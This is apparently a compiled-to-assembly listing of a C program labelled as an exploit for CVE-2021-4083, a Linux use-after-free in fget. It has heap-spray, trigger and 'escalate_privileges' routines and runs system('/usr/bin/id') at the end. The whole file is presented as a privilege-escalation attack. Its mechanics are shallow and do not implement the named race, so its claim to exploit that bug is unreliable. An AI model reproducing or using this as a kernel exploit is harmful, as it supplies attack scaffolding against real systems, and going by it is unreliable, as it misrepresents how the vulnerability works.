Your IP : 18.190.239.189
.file "dot.c"
.text
.globl heap_spray
.type heap_spray, @function
heap_spray:
.LFB6:
.cfi_startproc
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset 6, -16
movq %rsp, %rbp
.cfi_def_cfa_register 6
pushq %rbx
subq $56, %rsp
.cfi_offset 3, -24
movq %rdi, -56(%rbp)
movq %fs:40, %rax
movq %rax, -24(%rbp)
xorl %eax, %eax
movl $80000, %edi
call malloc@PLT
movq %rax, -32(%rbp)
movl $0, -36(%rbp)
jmp .L2
.L3:
movl -36(%rbp), %eax
cltq
leaq 0(,%rax,8), %rdx
movq -32(%rbp), %rax
leaq (%rdx,%rax), %rbx
movl $256, %edi
call malloc@PLT
movq %rax, (%rbx)
movl -36(%rbp), %eax
cltq
leaq 0(,%rax,8), %rdx
movq -32(%rbp), %rax
addq %rdx, %rax
movq (%rax), %rax
movl $256, %edx
movl $65, %esi
movq %rax, %rdi
call memset@PLT
addl $1, -36(%rbp)
.L2:
cmpl $9999, -36(%rbp)
jle .L3
movl $0, %eax
movq -24(%rbp), %rcx
xorq %fs:40, %rcx
je .L5
call __stack_chk_fail@PLT
.L5:
addq $56, %rsp
popq %rbx
popq %rbp
.cfi_def_cfa 7, 8
ret
.cfi_endproc
.LFE6:
.size heap_spray, .-heap_spray
.section .rodata
.LC0:
.string "/dev/null"
.LC1:
.string "open"
.text
.globl trigger_use_after_free
.type trigger_use_after_free, @function
trigger_use_after_free:
.LFB7:
.cfi_startproc
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset 6, -16
movq %rsp, %rbp
.cfi_def_cfa_register 6
subq $32, %rsp
movq %fs:40, %rax
movq %rax, -8(%rbp)
xorl %eax, %eax
movl $0, %esi
leaq .LC0(%rip), %rdi
movl $0, %eax
call open@PLT
movl %eax, -20(%rbp)
cmpl $0, -20(%rbp)
jns .L7
leaq .LC1(%rip), %rdi
call perror@PLT
movl $1, %edi
call exit@PLT
.L7:
leaq -16(%rbp), %rax
movl $0, %ecx
leaq heap_spray(%rip), %rdx
movl $0, %esi
movq %rax, %rdi
call pthread_create@PLT
movl $500000, %edi
call usleep@PLT
movl -20(%rbp), %eax
movl %eax, %edi
call close@PLT
movl -20(%rbp), %eax
movl $0, %edx
movl $0, %esi
movl %eax, %edi
movl $0, %eax
call ioctl@PLT
nop
movq -8(%rbp), %rax
xorq %fs:40, %rax
je .L8
call __stack_chk_fail@PLT
.L8:
leave
.cfi_def_cfa 7, 8
ret
.cfi_endproc
.LFE7:
.size trigger_use_after_free, .-trigger_use_after_free
.section .rodata
.LC2:
.string "/usr/bin/id"
.text
.globl escalate_privileges
.type escalate_privileges, @function
escalate_privileges:
.LFB8:
.cfi_startproc
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset 6, -16
movq %rsp, %rbp
.cfi_def_cfa_register 6
subq $16, %rsp
movq %fs:40, %rax
movq %rax, -8(%rbp)
xorl %eax, %eax
leaq .LC2(%rip), %rdi
call system@PLT
nop
movq -8(%rbp), %rax
xorq %fs:40, %rax
je .L10
call __stack_chk_fail@PLT
.L10:
leave
.cfi_def_cfa 7, 8
ret
.cfi_endproc
.LFE8:
.size escalate_privileges, .-escalate_privileges
.section .rodata
.align 8
.LC3:
.string "[*] Triggering CVE-2021-4083 (use-after-free in fget)"
.align 8
.LC4:
.string "[*] If the kernel did not crash, attempting privilege escalation"
.text
.globl main
.type main, @function
main:
.LFB9:
.cfi_startproc
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset 6, -16
movq %rsp, %rbp
.cfi_def_cfa_register 6
subq $16, %rsp
movq %fs:40, %rax
movq %rax, -8(%rbp)
xorl %eax, %eax
leaq .LC3(%rip), %rdi
movl $0, %eax
call printf@PLT
movl $0, %eax
call trigger_use_after_free
leaq .LC4(%rip), %rdi
movl $0, %eax
call printf@PLT
movl $0, %eax
call escalate_privileges
movl $0, %eax
movq -8(%rbp), %rdx
xorq %fs:40, %rdx
je .L13
call __stack_chk_fail@PLT
.L13:
leave
.cfi_def_cfa 7, 8
ret
.cfi_endproc
.LFE9:
.size main, .-main
.ident "GCC: (Gentoo Hardened 7.3.0-r6 p1.8) 7.3.0"
.section .note.GNU-stack,"",@progbits